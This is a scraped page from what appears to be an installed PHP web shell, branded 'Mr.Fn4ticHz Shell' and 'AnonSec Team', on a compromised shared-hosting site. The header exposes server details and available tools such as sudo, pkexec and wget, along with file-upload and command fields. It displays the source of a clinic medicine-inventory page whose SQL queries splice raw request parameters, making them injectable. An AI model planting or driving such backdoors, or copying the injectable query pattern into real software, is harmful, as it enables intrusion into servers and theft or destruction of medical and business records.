Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.14.142.194
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/testinv.php
<?php
session_start();
include("dbconnection.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
include("header.php");
include("workdeskmenu.php");

?>
<?php
session_start();
include("dbconnection.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
if(isset($_POST[opdmedicine]))
{
		PatientManager::Medicinestokinventory("$_GET[medicine_id]","$_POST[invoice_no]","$_POST[date_of_purchase]","$_POST[vendor]","$_POST[date_invoice]","$_POST[Cmrp]","$_POST[cost_gst]","$_POST[Batch_number]","$_POST[HSN_No]","$_POST[mrp]","$_POST[gst]","$_POST[Quantity]","$_POST[Expiry_Date]","$_POST[entered_by]");
	 }
	 if(isset($_GET[delid]))
{
	$sql ="DELETE FROM medicine_inventory WHERE medicine_id='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
		echo "<script>alert('Deleted successfully..');</script>";
	}
}
?>
<!DOCTYPE html>
<html>  <head>
    <title>Medicine in Stock</title>
    <style>
      .modal {
        display: none;
        position: fixed;
        z-index: 8;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        overflow: auto;
        background-color: rgb(0, 0, 0);
        background-color: rgba(0, 0, 0, 0.4);
      }
      .modal-content {
        margin: 50px auto;
        border: 1px solid #999;
        width: 60%;
      }
      h2,p {
        margin: 0 0 20px;
        font-weight: 400;
  
      }     
     .form1 {
        padding: 25px;
        margin: 25px;
        box-shadow: 0 2px 5px #f5f5f5;
        background: #eee;
      }
      input,
      textarea, select {
        width: 100%;
        padding: 6px;
        margin-bottom: 20px;
        border: 1px solid #1c87c9;
        outline: none;
      }
      .contact-form button {
        width: 100%;
        padding: 10px;
        border: none;
        background: #1c87c9;
        font-size: 16px;
        font-weight: 400;
        color: #fff;
      }
      button:hover {
        background: #2371a0;
      }
      .close {
        color: #aaa;
        float: right;
        font-size: 58px;
        font-weight: bold;
      }
      .close:hover,
      .close:focus {
        color: black;
        text-decoration: none;
        cursor: pointer;
      }
      button.button {
        display: inline-block;
       
        border-bottom: #02274a 1px solid;
     
        font-size: 19px;
        cursor: pointer;
      }
      
      button.button:hover {
    
        border-bottom: #a99567 1px solid;
        color: #a99567;
      }
      
    </style>
      <style>

 
/* Automatic Serial Number Row */
.css-serial {
 counter-reset: serial-number; /* Set the serial number counter to 0 */
}
.css-serial td:first-child:before {
 counter-increment: serial-number; /* Increment the serial number counter */
 content: counter(serial-number); /* Display the counter */
}
</style>
  </head>
  <body>
      
   
      <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">     
        
    <h2 Align="center">Medicine in Stock </h2>
    
    <input type="search" class="light-table-filter" data-table="order-table" placeholder="Search" />
    <p align="right">
      <button class="button" data-modal="modalOne11"> Add New Stock</button>
    </p>
        <table id="example2"  class="order-table table table-bordered table-hover css-serial">
                  <thead>
         
						<tr>
						    <tr><th>Batch No & HSN No</th>
               <th>Cost Price & MRP & GST</th> <th>Expiry Date</th><th>Quantity</th><th>Action</th></tr>
          
						</tr>
				
      
                  </thead>
  <?php
     
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$sql ="SELECT * FROM medicine_inventory WHERE medicine_id='$_GET[medicine_id]'";
$qsql = mysqli_query($con,$sql);
while($rs = mysqli_fetch_array($qsql))
		{
     echo "
     <tr><td> <b>Batch No :</b>$rs[Batch_number]<br> <b>HSN No :</b>$rs[HSN_No]</td><td><b>Cost Price :</b>$rs[Cmrp] <br> <b>MRP :</b>$rs[mrp] <br><b>GST %:</b>$rs[gst]</td><td>$rs[Expiry_Date]</td><td>$rs[Quantity] </td>
     <td><div class='btn-group'>
	  <button type='button' class='btn btn-default dropdown-toggle' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'>
	    Action <span class='caret'></span>
	  </button>
	  <ul class='dropdown-menu'>
	 <li><a href='edit_inventory.php?inventory_id=$rs[inventory_id]'> <i class='glyphicon glyphicon-save'></i> Edit</a></li> 
	      <li><a href='Add_inventory.php?delid=$rs[inventory_id]')'> <i class='glyphicon glyphicon-save'></i> Remove</a></li>
	   	  </ul>
	</div></td>
              					
          </tr>                   
          
  ";
		}
		?>
		   
      
              		    </tbody>
  <tfoot>
          </tfoot>
        </table>
    <div id="modalOne11" class="modal">
      <div class="modal-content">
        <div class="contact-form">
          <a class="close">&times;</a>
                   <form class='form1' name="opdmedicine" method="post">
                       <?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
     echo "
<input type='hidden' value='$re[entered_by]' name='admin_id' >
";
}
?><label>Invoice No</label>
			<input type='text' name='invoice_no' placeholder='Enter Invoice No'>
			<label>Date of Purchase</label>
				<input type='date' name='date_of_purchase' placeholder='Enter Invoice No'>
				<label>Vendor</label>
								<select  class="form-control" name="vendor" required>
    <option value="" disabled selected>Vendor name </option>
    <?php
     include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
$sql ="SELECT * FROM list_vendor WHERE adminid='$re[entered_by]'";
$qsql = mysqli_query($con,$sql);
while($rs = mysqli_fetch_array($qsql))
		{
		    echo"
                                    <option value='$rs[vid]'>$rs[name]</option>";
		}
		}
                                    ?>
                                    
    </select>
		
			<lable>Cost Of Price</lable><input type='text'  placeholder='Cost Of Price' name='Cmrp'>
			<lable>Cost GST</lable><input type='text'  placeholder='Cost Of GST' name='cost_gst'> 
				<label>Batch No</label><input type='text'  placeholder='Batch number' name='Batch_number' id='Batch_number' class='form-control'>
			<lable>HSN NO</lable><input type='text'  placeholder='HSN_No' name='HSN_No'>
			<label>MRP</label><input type='text'  placeholder='MRP' name='mrp' id='mrp' class='form-control'>
			<label>GST</label>
			<input type='text'  placeholder='GST in % ' name='gst' id='gst' class='form-control'>
			<label>Expiry Date</label><input type='date'  placeholder='price' name='Expiry_Date' id='Expiry_Date' class='form-control'>
			
            <label>Quantity</label><input type='text'   placeholder='Quantity' name='Quantity' id='Quantity' class='form-control'>
                
            </tr>
				

       <input type="submit" value="Add" name="opdmedicine">
      </form>
         
   </div>  
  
  </body>
</html>
<script>
 let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>

Anon7 - 2022
AnonSec Team